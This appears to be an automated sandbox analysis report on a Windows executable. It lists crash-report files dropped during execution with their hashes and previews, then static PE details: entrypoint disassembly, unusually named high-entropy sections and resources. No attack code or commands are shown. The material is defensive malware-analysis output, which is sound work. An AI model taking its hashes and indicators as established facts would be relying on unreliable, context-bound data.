                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER433B.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.490268603129628
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYIYm8M4J/HFxjq+q8vG0eRYld:uIjfjI7qO7VcJHqK/SYld
                                MD5:51BA80D37B008C9E810F1881676915B0
                                SHA1:ABDE5225646A61CB0A40A12A9ADF66C87E5E74B5
                                SHA-256:60DC903F0DF7C202DB6331211CC4FF5F6F016A3636050E6D0A73EB372FE716FA
                                SHA-512:408AA7C2D17C3FAB20C80DFF4D41E1114718C1C67651613F594E072E05E0AFCA229C48636D120C31E6ABC3E39981FCAEBC0D94B01C0D658E491241AD389A09F9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER452D.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:08 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):101974
                                Entropy (8bit):1.70003865925256
                                Encrypted:false
                                SSDEEP:384:vSxuS13iAEeszpPvNIIuT/rgjjD/CWJR6qlkGqQ8UD0:vPS1yAEes1PvvjjD/CWp7A
                                MD5:875B74E103645B328B617721CC4B7E87
                                SHA1:F10659D9EB20B7DF3A8D3570102A24316263B556
                                SHA-256:F98C89FEECC91EF6964325B9E0272EAAF0D5A54F3DC9395B57B0569BF387F918
                                SHA-512:5E970E6A5DD2D1BDB14852E9D90A83CACD626B7E2C38DEA82D828A173CC073D90FAE9F462D4EDAAAD6C693456AE518A3D7849D66DEBFD857FCDF81D4496DCCAC
                                Malicious:false
                                Preview:MDMP..a..... .......D..g........................(...............f;..........T.......8...........T............*..>d......................................................................................................eJ......8.......GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER45DA.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.7043781264973528
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMp6B6YEIklSUQ/LsgmfDFpBP89bQisftwm:R6lXJS6B6YEJlSUQ/AgmfD6Qhfv
                                MD5:B4596C336513B9DA365A454414024016
                                SHA1:00F15200E09912B81D930B08DB6645D5B9F99DEE
                                SHA-256:998D2CB195A2BC59463639E1D1083C7AA8311F9324C6599942D3BDF0540FB99E
                                SHA-512:3FA511FA89263DEEB70DAD91817E0DD92E3E1D7CCEFD6214D2792EED770AC8EBFCC4E8663AD58D6D7A08AE58491CFD05F77DF38C76719B5A68D9B9CC484A2C54
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4609.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491856035589698
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYTYm8M4J/HFvWI+q8vG0eRYld:uIjfjI7qO7VbJRK/SYld
                                MD5:CFD4F7EB83DB84CD25B964E3529CC481
                                SHA1:178C1162F195759A7FCB21E7DE38679BB2E88F01
                                SHA-256:B5F0B4D3A197CB5EC00B5300FB9F8EA36A9172420C8036C2BBB327DC55CECFC3
                                SHA-512:8BF7C2C1AA8B39B0ABCD234F2718108D4A1CF07CEE3439BDEACD20B445F679AFA1EC6F18FDB426F916C8EA5049A2D25FDB59D1F40BE221AF75D96A0D1E26A663
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER49A1.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:10 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):114678
                                Entropy (8bit):1.8275237192852272
                                Encrypted:false
                                SSDEEP:384:6Wixku1SAEMYud6zeOn3PTNkIwT/7e+jD/CWJAMMrSmfVM+JT8rc1:bu8AEnud6KOrH+jD/CWKtnJwI
                                MD5:1DE74A6B182596F0550CDBDA316CB8B0
                                SHA1:A2E51D5EFBE2CD1CF2C159B740886C53DE059C82
                                SHA-256:3CEE61E03BA031C2D75D898F59E9C99E350B24E9C0091504B1E631CE6F69E69B
                                SHA-512:E43F226ED27AE5B860CEDB936A68FFD5A93651F233AF63D2C1666A0592CEC1450ADD188F9BFD6D937FDD7FE28D7E22BB37D022747E8F4F1F4F17A9D4104E1C90
                                Malicious:false
                                Preview:MDMP..a..... .......F..g........................................z@..........T.......8...........T...........X0..........................................................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A1F.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.7055027591143705
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMj6G6YEIkK0SUo3/mgmfDFpBT89bgisfxgm:R6lXJ46G6YEJpSUu/mgmfDughfD
                                MD5:9991E1A12A183743E999166457315A8A
                                SHA1:7FF581301F991E93F5B14A604ED9F2C80DC059B1
                                SHA-256:D4427510E48C739A10F758EFA9ED7E0015E1003D98F22C2CD22F65C11D042C27
                                SHA-512:9B791683D569421EAF7B639F502C1B6480A1DDCA7DAF49F888111C17BA52C4A03BB4A17475F96B0844AB73C735DE36FCE5925E12DCF560B99E58AE1960307ED7
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A40.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491282796860016
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYrYm8M4J/HFC+q8vG0eRYld:uIjfjI7qO7V3J4K/SYld
                                MD5:73278FD55039AF183CC858C923B596D6
                                SHA1:B2F046EE466724ACD92FA9E007FD19ED6A339721
                                SHA-256:90DF732B72B8CC4BF4F161A0A07EE382B249FE3399D39FAB85954E1A91214887
                                SHA-512:1F14C1735EE207FDB08A25C9FABE5A9300A2866BFE81A11739E56ED9EAE5C28E6516E231D0F9FC1E7624520857A7E6E3CC902D9811B837C42AC382B94FA960AE
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5615.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:13 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):60356
                                Entropy (8bit):1.8043498263060342
                                Encrypted:false
                                SSDEEP:192:1yBrGFnh7XwfsOAOJwH0M+IBHSrPVKIcn8dFqDYOeQ1yRZYFajccuAloLUNr0NA:4iFnCAEzIBHS9v8ZyCajMADNreA
                                MD5:B29F5C3DD829FEFB6401147AB34CBBE2
                                SHA1:9E3D28A060631BAB75CFF5C2FD72D7D2B9027474
                                SHA-256:2CC5BAA025747D0F97E35E99F0D6D2AC277572BEDA95FB09E785E3BDFB9472A6
                                SHA-512:4994D8B7036CA04A8295B3CBBB93E07C44EE52C13AD3A6A1233F384C6F7657CC5BE3D46B9FD93C99F64E3E6F287B4152339DF1B93F1AF690315E18C803750544
                                Malicious:false
                                Preview:MDMP..a..... .......I..g............4...............<...........0*..........T.......8...........T............2.............X...........D...............................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5674.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8338
                                Entropy (8bit):3.7030068183474896
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMM6C6YEIkuSUz/OgmfmkymqpDRC89bbisfoJm:R6lXJv6C6YEJuSUz/Ogmfmt7bhfb
                                MD5:9568BE933ED7B60D689BAE6F36096893
                                SHA1:BEAC059E41E305369D7AC3A4B042B24E48ED2700
                                SHA-256:B9CC99914E967ECC85086F8370C373CB1A4CB97ED4A168D90E5CA3B652BDB0A1
                                SHA-512:11FA46CA688FB796A5B655B447F8CA1D1B71946F22406ADD6FEEC409B21A50DB772A54979EDA034590CC21772D205BC2CB9EE0FA882A4619384C04D1F58C71A6
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5694.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4579
                                Entropy (8bit):4.470361341953126
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYyYm8M4J/qLFUZ8I+q8ew4eRYld:uIjfjI7qO7ViJy+Zx44SYld
                                MD5:C6B54BA331F6F942E3CFE655765CDB31
                                SHA1:F513C3A1C272DD65F5AC9D25393D05E3C523F2F1
                                SHA-256:27EA01BBD0286F131D78801939B0EE80B4B754A432CE3CADC0BC09DFE3AF2F1D
                                SHA-512:18857FEFDC8099A248005208BED0935AE9D03C45709C2B015472B24D9A00F0DD897839AC48EF64D507746EC7AC665E5AE218C0B05E1B3E11DBC9A19F525CB546
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\Windows\appcompat\Programs\Amcache.hve

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.421552564282905
                                Encrypted:false
                                SSDEEP:6144:tSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNO0uhiTw:UvloTMW+EZMM6DFyw03w
                                MD5:197A31A893A8E46046766B6328EC2C01
                                SHA1:A5E4176C904346DD0AE4BAA2D180BFF18634D817
                                SHA-256:1FDB1EEA0A6DA557EFA54D6B66C697CBA0ACA821971147E539642037356CF4FE
                                SHA-512:4D8E16C30ACA9DABB0CD60A0B43F61328382E7D961B8CC6018F21FF8E7F6520E646190BBA58B1B32AE5F01EE3406B96D08938283AC3BAA2E9DC78F7318305FFF
                                Malicious:false
                                Preview:regfD...D....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..A...............................................................................................................................................................................................................................................................................................................................................5..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.053538020345029
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:YLshJwBcrT.exe
                                File size:336'384 bytes
                                MD5:015ac525cdf1038d8ceb75ba43068da0
                                SHA1:dc28851e6a02c567dfeabcd3d642f06f5f569d5e
                                SHA256:33367a662e6fe40c4fc42063a7c676a376674552e4abde488a25695bcc211552
                                SHA512:7f913d1bbc987e65395c6f2f765e14bc91aacff1c45cefd53ce61d2799341a8235a17b9188ac167fa768e4702c4c0edc37eccd201ee08e54885b8d56598cf439
                                SSDEEP:6144:p4L2r6u4jXBszUaHqmXK6+ajmns9lU0RyuG41cB27mg8BjtvBj:aarrkBsQaH7+ajmn8pRk4qB4mRz
                                TLSH:9E64C05126F1AC17F3F7453A5975A6E8793BBDA7AE30C05E1200F68F0C726918A41B2F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L....gQe...................

                                File Icon

                                Icon Hash:17694db2b24d3117

                                Static PE Info

                                General

                                Entrypoint:0x401667
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6551671D [Mon Nov 13 00:00:29 2023 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28

                                Entrypoint Preview

                                Instruction
                                call 00007F83DD22AAA4h
                                jmp 00007F83DD227EAEh
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                sub esp, 00000328h
                                mov dword ptr [004353C8h], eax
                                mov dword ptr [004353C4h], ecx
                                mov dword ptr [004353C0h], edx
                                mov dword ptr [004353BCh], ebx
                                mov dword ptr [004353B8h], esi
                                mov dword ptr [004353B4h], edi
                                mov word ptr [004353E0h], ss
                                mov word ptr [004353D4h], cs
                                mov word ptr [004353B0h], ds
                                mov word ptr [004353ACh], es
                                mov word ptr [004353A8h], fs
                                mov word ptr [004353A4h], gs
                                pushfd
                                pop dword ptr [004353D8h]
                                mov eax, dword ptr [ebp+00h]
                                mov dword ptr [004353CCh], eax
                                mov eax, dword ptr [ebp+04h]
                                mov dword ptr [004353D0h], eax
                                lea eax, dword ptr [ebp+08h]
                                mov dword ptr [004353DCh], eax
                                mov eax, dword ptr [ebp-00000320h]
                                mov dword ptr [00435318h], 00010001h
                                mov eax, dword ptr [004353D0h]
                                mov dword ptr [004352CCh], eax
                                mov dword ptr [004352C0h], C0000409h
                                mov dword ptr [004352C4h], 00000001h
                                mov eax, dword ptr [00434008h]
                                mov dword ptr [ebp-00000328h], eax
                                mov eax, dword ptr [0043400Ch]
                                mov dword ptr [ebp-00000324h], eax
                                call dword ptr [000000CCh]

                                Rich Headers

                                Programming Language:
                                • [C++] VS2008 build 21022
                                • [ASM] VS2008 build 21022
                                • [ C ] VS2008 build 21022
                                • [IMP] VS2005 build 50727
                                • [RES] VS2008 build 21022
                                • [LNK] VS2008 build 21022

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x336c40x3c.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x1d348.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x333f80x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x320000x184.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x308cf0x30a00505be99ef9c1f51c06b04f2b139bafe9False0.9252440151028277data7.872518755623235IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x320000x1fa00x2000cbb94a8c54dfb9bbd30a01ee0dd3d905False0.3682861328125data5.598363170922723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x340000xda67c0x1400e5fedb9779fb3c99166803ddd4e59404False0.1677734375data1.8223650873157855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .dotej0x10f0000x7c0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .tls0x1100000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .beciluy0x1110000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x1120000x14e3480x1d4007ee9c27840c459a68259c23cfe7e3698False0.4630492120726496data5.10753171212464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_CURSOR0x12a5580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                RT_ICON0x112a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5711620469083155
                                RT_ICON0x1138d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.641245487364621
                                RT_ICON0x1141800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6941244239631337
